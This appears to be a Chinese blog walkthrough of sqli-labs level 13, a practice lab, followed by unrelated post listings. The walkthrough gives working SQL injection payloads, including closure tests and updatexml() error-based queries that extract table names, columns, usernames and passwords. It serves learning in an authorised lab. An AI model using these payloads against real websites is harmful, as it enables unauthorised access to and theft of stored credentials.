当前位置：首页 > news >正文

sqli-labs关卡13(基于post提交的单引号加括号的报错盲注)通关思路

news 2025/9/19 9:32:08

文章目录

前言
一、回顾第十二关知识点
二、靶场第十三关通关思路
- 1、判断注入点
- 2、爆显位
- 3、爆数据库名
- 4、爆数据库表
- 5、爆数据库列
- 6、爆数据库关键信息
总结

前言

此文章只用于学习和反思巩固sql注入知识，禁止用于做非法攻击。注意靶场是可以练习的平台，不能随意去尚未授权的网站做渗透测试！！！

一、回顾第十二关知识点

通过第十二关的学习，我们了解到post注入的基本流程，其实和get注入相差不大，只是注入的地方不一样罢了。

二、靶场第十三关通关思路

1、判断注入点
2、爆显位
3、爆数据库名
4、爆数据库表
5、爆数据库列
6、爆数据库关键信息

1、判断注入点

老规矩还是使用万能语句1 or 1=1 和 1 or 1=2发现页面正常，所以排除数字型。输入1'发现报错，报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘‘1’’) and password=(‘’) LIMIT 0,1’ at line 1

通过报错信息可以猜测应该是单引号加括号闭合，这里我们试一下构造payload

1') or 1=1#

1') or 1=2#

发现1=1页面正常，1=2页面异常，细心发现页面正常异常没有返回回显内容，所以不能用联合查询了。可以试一试报错注入或者是布尔盲注，我个人喜欢用报错注入。(如图所示)
在这里插入图片描述

2、爆显位

注入语句为

1') order by 3#

在这里插入图片描述
发现3报错，那么显位是2

3、爆数据库名

注入语句为

1') or updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述
得数据库名

4、爆数据库表

注入语句为

1') and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键表名users

5、爆数据库列

注入语句为

1') and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

1') and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

得到列名username，password
在这里插入图片描述

6、爆数据库关键信息

注入语句为

1') and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

1') and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

在这里插入图片描述

在这里插入图片描述
得到关键信息

总结

这一关用的是报错注入，布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的，大佬路过请多指教！

sqli-labs关卡13(基于post提交的单引号加括号的报错盲注)通关思路

文章目录前言一、回顾第十二关知识点二、靶场第十三关通关思路1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识，禁止用于做非法攻击。注意靶场是可以练习的平台，…...

编程日记 2023/11/14 20:46:21

SparkAi创作系统ChatGPT网站源码+详细搭建部署教程+AI绘画系统+支持GPT4.0+Midjourney绘画

一、AI创作系统 SparkAi创作系统是基于OpenAI很火的ChatGPT进行开发的Ai智能问答系统和Midjourney绘画系统，支持OpenAI-GPT全模型国内AI全模型。本期针对源码系统整体测试下来非常完美，可以说SparkAi是目前国内一款的ChatGPT对接OpenAI软件系统。那么如…...

编程日记 2023/11/14 20:45:19

shiro默认session设置永不超时

Shiro默认情况下session是有超时时间的，而不是永不超时。默认的超时时间是30分钟，可以通过修改Shiro的配置文件来更改超时时间。如果想要让session永不超时，可以将超时时间设置为一个很大的值，例如Integer.MAX_VALUE。以下是修改…...

编程日记 2023/11/14 20:44:18

前端食堂技术周刊第 104 期：Angular v17、GPTs、Vue vapor mode、Svelte Flow、Bundler 的设计取舍

美味值：🌟🌟🌟🌟🌟 口味：金奖乳鸽食堂技术周刊仓库地址：https://github.com/Geekhyt/weekly 大家好，我是童欧巴。欢迎来到前端食堂技术周刊，我们先来看下…...

编程日记 2023/11/14 20:42:16

list复制出新的list后修改元素，也更改了旧的list？

例子 addAll() Testpublic void CopyListTest(){Student student Student.builder().id(1).name("张三").age(23).classId(1).build();Student student2 Student.builder().id(2).name("李四").age(22).classId(1).build();List<Student> student…...

编程日记 2023/11/14 20:40:14

Qt绘制各种图形

重载绘图事件： protected:void paintEvent(QPaintEvent *event) Q_DECL_OVERRIDE;void Widget::paintEvent(QPaintEvent *event) { 进行绘图操作 } 绘图前操作： //基本绘图QPainter painter(this);//创建QPainter对象painter.setRenderHint(QPa…...

编程日记 2023/11/14 20:38:11

NIO 笔记（二）Netty框架专题

【笔记来自：it白马】 Netty框架前面我们学习了Java为我们提供的NIO框架，提供使用NIO提供的三大组件，我们就可以编写更加高性能的客户端/服务端网络程序了，甚至还可以自行规定一种通信协议进行通信。 NIO框架存在的问题但是之…...

编程日记 2023/11/14 20:35:06

HTTP——

HTTP 请求报文的构成如下图：第一行：HTTP请求的方法，具体是POST方法还是GET方法，或是其它方法；URI就是你的HTTP请求的路径；后面是HTTP协议的版本；第二行往下连续多行：这些是请求头部分，也就是请求的首部设置的一些信息，相当于对HTTP请求的一些设置；空格行：在…...

编程日记 2023/11/14 20:34:04

第13章 Java IO流处理（二）字节流与字符流

目录内容说明章节内容 1、I/O与流 2、输入流和输出流 3、字节流与字符流...

编程日记 2023/11/14 20:33:02

【论文阅读】(CTGAN)Modeling Tabular data using Conditional GAN

论文地址：[1907.00503] Modeling Tabular data using Conditional GAN (arxiv.org) 摘要对表格数据中行的概率分布进行建模并生成真实的合成数据是一项非常重要的任务，有着许多挑战。本文设计了CTGAN，使用条件生成器解决挑战。为了帮助进行公…...

编程日记 2023/11/14 20:32:01

如何进行iOS技术博客的备案？

如何进行iOS技术博客的备案？ 标题：iOS技术博客备案流程及要求解析摘要： 在本篇问答中，我们将为iOS技术博主介绍如何进行备案。如果你的iOS应用只包含简单的页面，并通过蓝牙进行数据采集和传输，那么你…...

编程日记 2023/11/14 20:29:59

RTSP/Onvif安防平台EasyNVR批量禁用/启用通道接口的详细操作步骤

TSINGSEE青犀视频安防监控平台EasyNVR可支持设备通过RTSP/Onvif协议接入，并能对接入的视频流进行处理与多端分发，包括RTSP、RTMP、HTTP-FLV、WS-FLV、HLS、WebRTC等多种格式。在智慧安防等视频监控场景中，EasyNVR可提供视频实时监控直播、云端…...

编程日记 2023/11/14 20:28:58

2个器件，做1个恒流源

在项目中经常要用到恒流源，查找资料可以使用电压源芯片LM317构造一个电流源芯片。本文将电压源加上一个电阻改为电流源，这种设计思路可以扩展到其他类型的电源芯片上，如开关电源及其他类型的线性电源，关键点在于基准电压VREF的使用…...

编程日记 2023/11/14 20:26:56

SQL INSERT INTO SELECT 语句

SQL INSERT INTO SELECT 语句使用SQL，您可以将信息从一个表中复制到另一个表中。 INSERT INTO SELECT 语句从表中复制数据，并将数据插入现有的表中。目标表中的任何现有行都不会受到影响。 SQL INSERT INTO SELECT 语法我们可以将所有列从一个表中复制…...

编程日记 2023/11/14 20:25:56

Elasticsearch 在 Java 开发中的应用

Elasticsearch 在 Java 开发中的应用 Elasticsearch 是一个开源的分布式搜索引擎，广泛应用于全文搜索、日志分析等场景。本文将介绍 Elasticsearch 在 Java 开发中的基本使用和一些实际场景中的应用。 1. 引入 Elasticsearch 依赖首先，需要在 Maven 或…...

编程日记 2023/11/14 20:23:53

linux 的uart驱动框架分析

文章目录一、底层串行硬件驱动程序二、Console支持三、锁支持四、核心数据结构1、struct uart_driver2、struct uart_port3、struct uart_ops四、常用API总结五、uart驱动示例剖析1、原厂设计的uart驱动2、8250标准uart驱动六、总结🔺【linux内核系列文章】 👉对一些文章内…...

编程日记 2023/11/14 20:22:51

头歌答案HTML——基础

目录 HTML——基础第1关：初识HTML：简单的Hello World网页制作任务描述第2关：HTML结构：自我简介网页任务描述 HTML——基本标签第1关：创建第一个 HTML 标签任务描述第2关：创建任务描述 …...

编程日记 2023/11/14 20:21:50

【数据结构——队列的实现（单链表）】

数据结构——队列的实现（单链表） 一.队列1.1队列的概念及结构二.队列的实现2.1 头文件的实现——（Queue.h）2.2 源文件的实现—— （Queue.c）2.3 源文件的实现—— （test.c） 三.队列的…...

编程日记 2023/11/14 20:20:50

《LeetCode力扣练习》代码随想录——链表（移除链表元素---Java）

《LeetCode力扣练习》代码随想录——链表（移除链表元素—Java） 刷题思路来源于代码随想录 203. 移除链表元素虚拟头结点 /*** Definition for singly-linked list.* public class ListNode {* int val;* ListNode next;* ListNode() {}* …...

编程日记 2023/11/14 20:19:49

linux 安装 mini conda，linux下安装 Miniconda

下载地址 https://docs.conda.io/projects/miniconda/en/latest/index.html 安装conda mkdir -p ~/miniconda3 wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda3/miniconda.sh bash ~/miniconda3/miniconda.sh -b -u -p ~/mini…...

编程日记 2023/11/14 20:18:48

文章目录

前言

一、回顾第十二关知识点

二、靶场第十三关通关思路

1、判断注入点

2、爆显位

3、爆数据库名

4、爆数据库表

5、爆数据库列

6、爆数据库关键信息

总结

相关文章：